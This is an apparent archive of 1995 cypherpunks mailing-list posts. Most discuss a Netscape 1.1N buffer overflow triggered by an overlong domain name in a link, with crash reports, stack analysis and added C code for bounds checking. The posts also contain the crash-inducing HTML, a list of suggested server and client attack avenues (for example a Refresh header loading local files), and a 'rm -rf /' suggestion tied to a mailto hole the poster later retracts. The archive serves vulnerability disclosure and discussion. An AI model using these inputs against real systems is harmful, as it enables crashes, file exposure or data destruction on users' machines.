.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo/foo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.f!
 oo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo> blah </a>

On my BSDI2.0 machine running Netscape 1.1N, this causes a segmentation
fault and subsequent coredump. GDB reports nothing useable (stripped
executable)

As you can see, I just chose an extremely long domain name. I guessed
that the authors of netscape probably thought something like "well,
a buffer size of 256 characters is good enough to hold any domain"

It's definitely the domain that's causing it, and not the length of
the URL or the data after the domain name.
 
I also tried to overflow some netscape servers using similar techniques
(and shell metacharacters in all sorts of URLs), to no avail. I suspect
a similar attack may work against the Netscape Server if it is proxying.


Does anyone have a disassembly of Netscape, or more specifically, 
a disassembly of the URL parse and domain lookup routines? I'd be
happy to collaborate and "Hack Netscape" ;-)


Happy Hacking,



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Fri, 22 Sep 95 00:24:28 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <v01510100ac8821ac2b23@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Ray Cromwell writes:
>> I've found a Netscape bug which I suspect is a buffer overflow and
>> may have the potential for serious damage. If it is an overflow bug,
>> then it may be possible to infect every computer which accesses a web
>> page with Netscape. To see the bug, create an html file containing
>> the following:
>
>Oh brother, this is unbelievable !
>
>I'm using Netscape 1.1N under SunOS 4.1.2.
>
>It turns out that the same (or a similar) flaw resides in the Open Location
>input routine -- perhaps this merely coincides with the code called when a
>URL is clicked. Anyway, pasting a URL with an overlong domain name a la Ray's
>example causes two things:
>
>(1) Part of the Open Location window widget, below the entry box, gets
>overwritten onscreen with a portion of the entered URL.
>
>(2) Netscape crashes with a segmentation fault (no core dump that I can see).

Netscape 1.1N on a powermac crashes hard on that url. If anyone wants to try
it out, I've put up a simple page with the url at

http://www.redweb.com/experiment/bug.html

*warning* view the source before you click on strange links!!!

I don't do PPC assembler, so I can't tell you what happened.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMGJysHIf3YegbdiBAQF/RAJWNVXvLgyPEjVVoGUNoX/AqKlIiT5Axmek
+dCoGJy6CMcP7fq3rB+DAt+SziIaG2X+rUSLt8ih39TBjD1FLAKKsE/VhBHJrp+v
pSoO
=jfLP
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 21 Sep 95 23:26:39 PDT
To: cypherpunks@toad.com
Subject: Netscape bug update
Message-ID: <199509220626.CAB16453@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  I just verified in GDB using a stack trace that the Netscape overflow
bug I mentioned is indeed a static stack buffer overflow. It trashes
the stack.

  What this means is that in theory, it is possible to get a simple
URL, if clicked on, to execute some code on someone's browser.

  Now the hard work begins...


Happy Hacking,
-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 21 Sep 95 23:52:42 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220612.CAA11441@clark.net>
Message-ID: <9509220652.AA06103@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ray Cromwell writes:
> I've found a Netscape bug which I suspect is a buffer overflow and
> may have the potential for serious damage. If it is an overflow bug,
> then it may be possible to infect every computer which accesses a web
> page with Netscape. To see the bug, create an html file containing
> the following:

Oh brother, this is unbelievable !

I'm using Netscape 1.1N under SunOS 4.1.2.

It turns out that the same (or a similar) flaw resides in the Open Location
input routine -- perhaps this merely coincides with the code called when a
URL is clicked. Anyway, pasting a URL with an overlong domain name a la Ray's
example causes two things:

(1) Part of the Open Location window widget, below the entry box, gets
overwritten onscreen with a portion of the entered URL.

(2) Netscape crashes with a segmentation fault (no core dump that I can see).

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 00:15:47 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <9509220652.AA06103@cs.umass.edu>
Message-ID: <199509220715.DAA27920@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Ray Cromwell writes:
> > I've found a Netscape bug which I suspect is a buffer overflow and
> > may have the potential for serious damage. If it is an overflow bug,
> > then it may be possible to infect every computer which accesses a web
> > page with Netscape. To see the bug, create an html file containing
> > the following:
> 
> Oh brother, this is unbelievable !
> 
> I'm using Netscape 1.1N under SunOS 4.1.2.
> 
> It turns out that the same (or a similar) flaw resides in the Open Location
> input routine -- perhaps this merely coincides with the code called when a
> URL is clicked. Anyway, pasting a URL with an overlong domain name a la Ray's
> example causes two things:
> 
> (1) Part of the Open Location window widget, below the entry box, gets
> overwritten onscreen with a portion of the entered URL.
> 
> (2) Netscape crashes with a segmentation fault (no core dump that I can see).


 The bug causes random things to happen because it trashes the stack. I
just did a test with http://aaaaaaa.(repeat pattern 42 times, followed by
5 a's), that's 341 characters in the domain. After a coredump, I inspected
the stack, and it has been trashed to hell, including the PC register
which was 0x61616161 (or 'aaaa' in ascii)

THIS IS A SERIOUS BUG!


Unlike the SSL crack (which took a supercomputer to crack), or
the RNG (which doesn't affect many people since there is not much
internet commerce actually going on), this bug has the potential
to damage millions of computers! This is almost enough to scare me
away from using netscape. You can guard yourself by always observing
the URL you are about to click on, but how many people will be
able to keep that up all the time given that Surfing almost
puts many people into a trancelike state?


[I hear Perry in the background groaning and muttering "I told you so"]
These buffer overflow bugs should be taught in every programming
101 course along with fencepost errors.

I'm not even sure if I want to write the obligatory program to exploit
the hack given that some malicious jerk would probably use it
on his home page to attack people.


-Ray
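
The length check whose absence this thread describes, as an added example (not code from the thread or from Netscape): the host part of a URL is measured against the RFC 1035 limits (253 characters in total, 63 per label) before anything is copied into the caller's buffer. The function names and status codes are made up for the sketch, the 341-character input is constructed to match the test described above, and IPv6 literals are not handled.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define HOST_MAX  253  /* longest DNS name in text form (RFC 1035) */
#define LABEL_MAX 63   /* longest single label (RFC 1035) */

enum host_status {
    HOST_OK = 0,
    HOST_NO_SCHEME,  /* no "://" in the input */
    HOST_TOO_LONG,   /* host exceeds HOST_MAX or the caller's buffer */
    HOST_BAD_LABEL   /* empty or overlong label, or illegal character */
};

/* Copy the host part of url into out (out_cap bytes including the NUL).
 * The length is measured and checked before any byte is copied, so the
 * destination cannot be overrun whatever the input length is. */
enum host_status extract_host(const char *url, char *out, size_t out_cap)
{
    const char *start, *end, *at = NULL, *colon, *p;
    size_t len, label = 0;

    if (out_cap == 0)
        return HOST_TOO_LONG;
    out[0] = '\0';

    start = strstr(url, "://");
    if (start == NULL)
        return HOST_NO_SCHEME;
    start += 3;

    /* The authority ends at the first '/', '?' or '#', or at end of string. */
    end = start + strcspn(start, "/?#");

    /* Skip an optional "user@" prefix and cut off an optional ":port". */
    for (p = start; p < end; p++)
        if (*p == '@')
            at = p;
    if (at != NULL)
        start = at + 1;
    colon = memchr(start, ':', (size_t)(end - start));
    if (colon != NULL)
        end = colon;

    len = (size_t)(end - start);
    if (len == 0)
        return HOST_BAD_LABEL;
    if (len > HOST_MAX || len >= out_cap)
        return HOST_TOO_LONG;

    /* Each label: letters, digits and '-' only, 1 to LABEL_MAX bytes. */
    for (p = start; p < end; p++) {
        if (*p == '.') {
            if (label == 0)
                return HOST_BAD_LABEL;
            label = 0;
        } else if (isalnum((unsigned char)*p) || *p == '-') {
            if (++label > LABEL_MAX)
                return HOST_BAD_LABEL;
        } else {
            return HOST_BAD_LABEL;
        }
    }
    if (label == 0)
        return HOST_BAD_LABEL;  /* this sketch also rejects a trailing dot */

    memcpy(out, start, len);
    out[len] = '\0';
    return HOST_OK;
}

/* Status for one URL with a 256-byte destination, the buffer size guessed
 * at earlier in the thread. */
enum host_status status_for(const char *url)
{
    char host[256];
    return extract_host(url, host, sizeof host);
}

/* Constructed input: "aaaaaaa." 42 times plus "aaaaa", a 341-byte domain. */
enum host_status status_for_341_char_host(void)
{
    char url[7 + 42 * 8 + 5 + 1];
    size_t n = 7, i;

    memcpy(url, "http://", 7);
    for (i = 0; i < 42; i++, n += 8)
        memcpy(url + n, "aaaaaaa.", 8);
    memcpy(url + n, "aaaaa", 6);  /* 5 letters and the terminating NUL */
    return status_for(url);
}

int main(void)
{
    printf("%d\n", status_for("http://www.example.com/index.html"));
    printf("%d\n", status_for_341_char_host());
    return 0;
}
```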






 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 01:01:26 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Mosaic Bug (same as Netscape bug) (was Re: Another Netscape Bug)
In-Reply-To: <43tpv8$rom@tera.mcom.com>
Message-ID: <9509220801.AA06875@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:
>   Not that I want to divert attention away from netscape(OK, maybe I
> do :-) ), but does this bug exist in any other common browser?

Good question.

Here's one answer, obtained using a minor variation on Ray's URL:

----------------------------------------------
Congratulations, you have found a bug in
NCSA Mosaic 2.4 on Sun.

If a core file was generated in your directory,
please run 'dbx Mosaic' (or 'dbx /path/Mosaic' if the
Mosaic executable is not in your current directory)
and then type:
  dbx> where
and mail the results, and a description of what you were doing at the time,
to mosaic-x@ncsa.uiuc.edu.  We thank you for your support.

...exiting NCSA Mosaic now.
----------------------------------------------------

Now, the question is, does Netscape use _the same code_ that was used in
Mosaic for this purpose ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Fri, 22 Sep 95 01:01:44 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: economic espionage (@#$%^&*)
In-Reply-To: <199509220711.AAA02426@ix9.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950922040156.18568B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Sep 1995, Bill Stewart wrote:

> 
> >>> >It was said that Pres. Clinton had given a speech while 
> >>> >visiting the  CIA HQ in Langley/Virginia. He allegedly 
> >>> >said in this speech that obtaining  industrial 
> >>> >informations has the highest priority and this were the 
> >>> >new  task for the spies.
> 
> Dr. John Deutsch, speaking to the National Press Club, also mentioned
> economic espionage, with the State Department as a primary
> customer, but was concerned about definitions of goals, etc.
> He did reassure the NPC that the CIA would continue to work with
> drug dealers and corrupt South American military and other scum
> who have information to sell, as well as cooperating more closely 
> with the FBI and DEA, but on the other hand he does apparently
> view domestic operations as clearly outside the CIA's job.
> One set of content in his speech was the planned combination of
> the various satellite data interpretation organizations
> into one group of CIA/Pentagon/NRO/NSA/etc.


It's important here to distinguish economic "espionage" and economic
"intelligence."

Espionage refers to the stealing of secrets with humint, and generally the
term economic espionage refers to the actual thefts as with the French
government stealing bids, and bag jobbing American businessmen.

Economic Intelligence is much older, and is more about economic analysis
on a macro scale of the target country.

I mention these because the doublespeak can trip up people who aren't
used to what the intelligence types are saying.

John Deutsch is definitely an economic intelligence man, but has in past
been quite opposed to economic espionage.


> 
> ObCrypto: One questioner asked him about the growing use
> of encoding and would the CIA be able to keep up eavesdropping on
> people.  "We're very good at eavesdropping" was his main reply;
> he did acknowledge that there was an issue but didn't go into 
> the party line about needing to have escrow to get GAK.
> 
> Clinton, meanwhile, reassured guests at a $1000/plate fundraising 
> lunch that the Republicans' economic plans would mainly affect
> the poor and wouldn't trouble the rich too much...   :-)
> #---
> # Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
> # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
> #---
> 
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 22 Sep 95 04:10:47 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Project: a standard cell random number generator
In-Reply-To: <9509221037.AA08096@cs.umass.edu>
Message-ID: <199509221110.EAA03110@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> futplex@pseudonym.com (Futplex) writes:
> John Gilmore writes:
> > In this sense, NSA ought to be *encouraging* Intel and
> > IBM and Motorola to put "generate random bits" instructions into
> > their instruction sets...

> Does Tessera include any form of hardware RNG ?

Yes.  Here's a released CAPSTONE spec sheet.  I don't expect an attack like
the one on Netscape to work there.

	Jim Gillogly
	Sterday, 1 Winterfilth S.R. 1995, 11:07

------- Forwarded Message

Date: Fri, 30 Apr 93 10:11:03 EDT
From: Clipper Chip Announcement <clipper@csrc.ncsl.nist.gov>
Organization: National Institute of Standards and Technology (NIST)
Posted-Date: Fri, 30 Apr 93 10:11:03 EDT
Subject: Capstone Chip technology information


                    CAPSTONE CHIP TECHNOLOGY


CAPSTONE is an NSA developed, hardware oriented, cryptographic
device that implements the same cryptographic algorithm as the
CLIPPER chip.  In addition, the CAPSTONE chip includes the
following functions:

     1.   The Digital Signature Algorithm (DSA) proposed by NIST
          as a Federal Information Processing Standard (FIPS);

     2.   The Secure Hashing Algorithm (SHA) recently approved as
          FIPS 180;

     3.   A Key Exchange Algorithm based on a public key
          exchange;

     4.   A general purpose exponentiation algorithm;

     5.   A general purpose, random number generator which uses a
          pure noise source.

The Key exchange Algorithm is programmable on the chip and uses
functions 1-2 and 4-5 above.

Prototypes of the CAPSTONE chip are due the last week in April. 
The chips are expected to sell for $85.00 each (programmed).

The first CAPSTONE chips are to be installed in PCMCIA electronic
boards and used for the PMSP program for the security of the
Defense Messaging System.

The CAPSTONE chip is big, complex and powerful.  Over 850
megabytes are required by the automated design system to define
the functions of the chip.  VLSI Technology is fabricating the
chip, and MYKOTRONX is designing and testing the chip.
                                

1.   What are the power requirements of the CAPSTONE chip?  Will
     they fit the power requirements of battery-operated, hand
     held devices?

     The CAPSTONE chip requires a 5 volt DC voltage source. 
     Power ratings are currently estimated at 3.5 milliamps per
     MHz, i.e. at 10 MHz and 5 volt DC, power consumed is 175
     milliwatts.  These estimates will be refined as data are
     taken into the actual chips.  In comparison, the CLIPPER
     chip consumes approximately 150 milliwatts at 5 volts DC and
     10 MHz.  As you can see, both chips fall within the power
     requirements of hand held, battery-operated devices.

2.   Will the CAPSTONE chip incorporate the key escrow features
     of the CLIPPER chip?

     Yes, it will.

3.   When will CAPSTONE be announced and available?

     Prototypes of the CAPSTONE chip are due the end of this
     month.  We ask that you contact the manufacturer, Mykotronx
     Inc., for further information concerning the timetable for
     availability of CAPSTONE.

4.   Is the Department of Defense working now to incorporate
     CAPSTONE in the Pre-message Security Protocol?

     Yes

5.   Will CAPSTONE meet the design requirements of a PCMCIA card
     that combines voice and/or data communications with
     encryption capabilities?

     Yes

6.   Will CAPSTONE use the Digital Signature Standard?  What kind
     of key management scheme will be employed in the CAPSTONE
     chip?  Will CAPSTONE allow the use of RSA public-key
     encryption in conjunction with, or as an alternative to, the
     DSS?  If RSA is implemented on the CAPSTONE chip, will the
     key escrow feature function?

     CAPSTONE implements the Digital Signature Algorithm (DSA),
     proposed by NIST as a Federal Information Processing
     Standard (FIPS), to perform the digital signature functions. 
     Key management is handled by an algorithm based on a public-
     key exchange technique.  The CAPSTONE chip does not
     implement RSA.


4/30/93



------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 01:14:47 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220715.DAA27920@clark.net>
Message-ID: <9509220814.AA06967@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


On the bright side, mailto: hyperlinks containing extra-long domain names
seem to be handled comparatively safely in both Netscape and Mosaic. 
(Perhaps they just have longer buffers ? ;)

Neither Netscape nor Mosaic crashes on a mailto:// of the same length as a
ftp:// or http:// that _would_ crash them. Netscape appears to do some sort
of truncation at some point (silently); Mosaic gives you a standard "server
is not accessible or is refusing to serve the document" warning page.

(Netscape 1.1N, Mosaic 2.4, SunOS 4.1.2)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 01:20:30 PDT
To: cypherpunks@toad.com
Subject: Netscape Server Attacks
Message-ID: <199509220820.EAA12405@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



No, calm down, I haven't found a hole in the server yet, but if you
want to win some T-Shirts, here's some potential avenues to try. I've
been messing with these, and maybe some other c'punk can find
one that will work.

1) buffer overflow attacks in the HTTP request header

Example: The HTTP/1.0 full request has an "If-Modified-Since" header
which takes a date string. If Netscape assumes this string is not going
to be longer than a certain width....
Look for ways to attack the HTTP request headers. See
http://www.w3.org/pub/WWW/Protocols/HTTP1.0/draft-ietf-http-spec.html

CGI attacks
2) Shell metacharacters, or extremely long paths, may lead the way to
executing arbitrary shell commands on the server.
3) Overflow the URL in a CGI GET by using too many form variables in
the response. 


Server attacking client
4) use the Location: redirection header to send a long domain
5) use Location: redirection or Refresh: to load up file:localfile
   You can force the browser to load up any arbitrary file the user
   has access to local to his client
  Example:     Refresh: 1 file:config.sys

6) send back a page with an EXTREME number of Motif HTML FORM widgets
in a <FORM>. E.g. send back 10,000 radio buttons.


Happy Hunting,
-Ray



   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 01:27:11 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
In-Reply-To: <199509220519.BAA02311@frankenstein.piermont.com>
Message-ID: <9509220827.AA07056@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


David Van Wie writes:
> It just moves the prior art date from the date of invention to the date 
> of filing the patent application.

.pm writes:
> Can you explain that? It doesn't make much sense...

I'll ask a more specific question:

What happens if the chronology goes like this ?

(0) Alice invents a snaffleblort.
(1) Bob invents a snaffleblort.
(2) Bob files for a patent on a snaffleblort.

From what you said, it would appear that Alice's prior art won't count when
it comes to considering the validity of Bob's patent claim. Is that correct ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 01:30:13 PDT
To: cypherpunks@toad.com
Subject: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <9509220814.AA06967@cs.umass.edu>
Message-ID: <199509220830.EAA13828@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On the bright side, mailto: hyperlinks containing extra-long domain names
> seem to be handled comparatively safely in both Netscape and Mosaic. 
> (Perhaps they just have longer buffers ? ;)

  Good question. My guess is, Netscape doesn't do any processing on the
mailto: hyperlink at all, but merely passes it to a real mail delivery
agent like Sendmail (or it uses MAPI under Win'95). Which begs
the question, if Netscape is executing an external delivery agent,
there may be the possibility of sneaking an attack in there and getting
the shell to execute something.

Hmm, let me try something.


WOW!! Unbelievable! Stop the presses! I Can't believe no one ever discovered
this before! Try a page with the following URL

 test 

Muahaha! Yet another security hole! Clicking on this mailto brings up
an xterm on my machine!  Simply change the xterm& to "rm -rf /" and
bingo!


Sheesh. I better stop before I am on Netscape's most hated list.


-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 01:37:09 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <199509220830.EAA13828@clark.net>
Message-ID: <199509220836.EAA14476@clark.net>
MIME-Version: 1.0
Content-Type: text/plain




Disregard that last message. Those drugs I was taking must have just kicked
in. I was running another program in the background which coincidentally
brought up an xterm at the same time I clicked on the link. Damn,
and I thought I had found another bug. Ah well. There's probably one lurking
there somewhere. It was good while it lasted. When I hit "send" and
that xterm popped up, I almost jumped out of my seat. ;-) Remember
this lesson, you should always try to repeat your bugs at least three
times. ;-)

-Ray









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 01:50:22 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <199509220830.EAA13828@clark.net>
Message-ID: <9509220850.AA07248@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ray Cromwell writes:
> WOW!! Unbelievable! Stop the presses! I Can't believe no one ever discovered
> this before! Try a page with the following URL
> 
>  test 
> 
> Muahaha! Yet another security hole! Clicking on this mailto brings up
> an xterm on my machine!  

This is curious, because Netscape 1.1N doesn't do this on my setup, unless I
misunderstand your description somehow. The full string including the pipe
and all come up in the To: field of the standard Netscape mailer window. At
that stage I see it as much less of a potential risk. I can't test what
happens if you actually try to send mail to such a trojan horse URL, because
there's some screwy configuration here that makes Netscape complain about
not being able to connect to localhost (!?!) when I try to send mail from it.

Mosaic 2.4 gives a standard warning page in response to this.

(I'm using SunOS 4.1.2)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 02:01:29 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Next Hack
In-Reply-To: <199509211832.LAA24086@infinity.c2.org>
Message-ID: <9509220901.AA07381@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


sameer writes:
> 2) Organize a net-wide search over the space of the RNG seed to 
> crack the private key of some well known secure server.
> 
> 3) Release the private key to the net.

FWIW, for the record, I'm uncomfortable with this. It sounds unethical, IMHO.

For me at least, targeting the key of some particular server that happens to
be out there is over the line.

If you said you would have someone volunteer a supposedly secure server for
the challenge, I'd have no qualms.

But hey, that's just one tentacle's opinion....

-Futplex <futplex@pseudonym.com>
"...when you talk about destruction, don't you know that you can count me out"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 02:36:12 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <43tvj4$t7v@tera.mcom.com>
Message-ID: <199509220936.FAA21793@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In article <199509220836.EAA14476@clark.net>, rjc@clark.net (Ray Cromwell) writes:
> > Disregard that last message. Those drugs I was taking must have just kicked
> > in. I was running another program in the background which coincidentally
> > brought up an xterm at the same time I clicked on the link. Damn,
> > and I thought I had found another bug. Ah well. There's probably one lurking
> > there somewhere. It was good while it lasted. When I hit "send" and
> > that xterm popped up, I almost jumped out of my seat. ;-) Remember
> > this lesson, you should always try to repeat your bugs at least three
> > times. ;-)
> 
>   Thanks for quickly posting this retraction.  For the record, netscape
> talks SMTP directly, and does not run an external program to send mail.

 No problem.  ;-) I congratulate you guys (Netscape) for reacting 
so quickly. ;-)

  BTW, I checked lynx for the big domain bug and it also crashes. It could
be a unix bug, but my own test program fails to crash looking up a
1000 character domain. Even so, Netscape should be enforcing a
sanity check on the domain.

-Ray
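
The sanity check on the domain asked for in the message above, sketched in C as an added example (not code from Netscape, lynx or any poster in this thread): the host is measured and checked against the DNS limits of 253 characters per name and 63 per label before anything is copied. The names url_host, try_label_of and host_is are assumptions made for the illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOST_MAX  253  /* longest DNS name in text form (RFC 1035) */
#define LABEL_MAX 63   /* longest single label between dots */

enum host_err { HOST_OK, HOST_NO_SCHEME, HOST_EMPTY, HOST_TOO_LONG,
                HOST_BAD_LABEL, HOST_BAD_CHAR, HOST_BUF_SMALL };

/*
 * Copy the host of "scheme://host[:port][/path]" into out.
 * The unsafe pattern the thread guesses at is a fixed array filled by an
 * unbounded copy (char host[256]; strcpy(host, p);). Here the length is
 * measured and checked before a single byte is written.
 */
enum host_err url_host(const char *url, char *out, size_t outlen)
{
    const char *p = strstr(url, "://");
    size_t n, i, label = 0;

    if (p == NULL)
        return HOST_NO_SCHEME;
    p += 3;
    n = strcspn(p, ":/?#");          /* host ends at port, path, query or fragment */
    if (n == 0)
        return HOST_EMPTY;
    if (n > HOST_MAX)
        return HOST_TOO_LONG;        /* no resolver could accept it anyway */
    if (n + 1 > outlen)
        return HOST_BUF_SMALL;       /* the caller's buffer sets the bound */

    for (i = 0; i < n; i++) {
        char c = p[i];
        if (c == '.') {
            if (label == 0)
                return HOST_BAD_LABEL;   /* leading dot or ".." */
            label = 0;
        } else if ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                   (c >= '0' && c <= '9') || c == '-') {
            if (++label > LABEL_MAX)
                return HOST_BAD_LABEL;
        } else {
            return HOST_BAD_CHAR;        /* also rejects user@host forms */
        }
    }
    memcpy(out, p, n);
    out[n] = '\0';
    return HOST_OK;
}

/* Constructed input: a URL whose first label is n copies of 'a'. */
enum host_err try_label_of(size_t n)
{
    char out[HOST_MAX + 1];
    char *url = malloc(n + 32);
    enum host_err e;

    if (url == NULL)
        return HOST_BUF_SMALL;
    memcpy(url, "http://", 7);
    memset(url + 7, 'a', n);
    strcpy(url + 7 + n, ".example/index.html");
    e = url_host(url, out, sizeof out);
    free(url);
    return e;
}

/* Returns 1 if url parses cleanly and its host equals expect. */
int host_is(const char *url, const char *expect)
{
    char out[HOST_MAX + 1];
    return url_host(url, out, sizeof out) == HOST_OK && strcmp(out, expect) == 0;
}

int main(void)
{
    printf("1000-char label: %d\n", try_label_of(1000));
    printf("64-char label:   %d\n", try_label_of(64));
    printf("63-char label:   %d\n", try_label_of(63));
    printf("normal URL ok:   %d\n", host_is("http://www.c2.org/", "www.c2.org"));
    return 0;
}
```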




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Thu, 21 Sep 95 23:08:18 PDT
To: cypherpunks@toad.com
Subject: Re: Fraud Fraut Froth
In-Reply-To: <199509211130.HAA20039@light.lightlink.com>
Message-ID: <43tjr3$ps8@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SUN.3.91.950921075223.28417A-100000@polaris.mindport.net>, unicorn@polaris.mindport.net (Black Unicorn) writes:
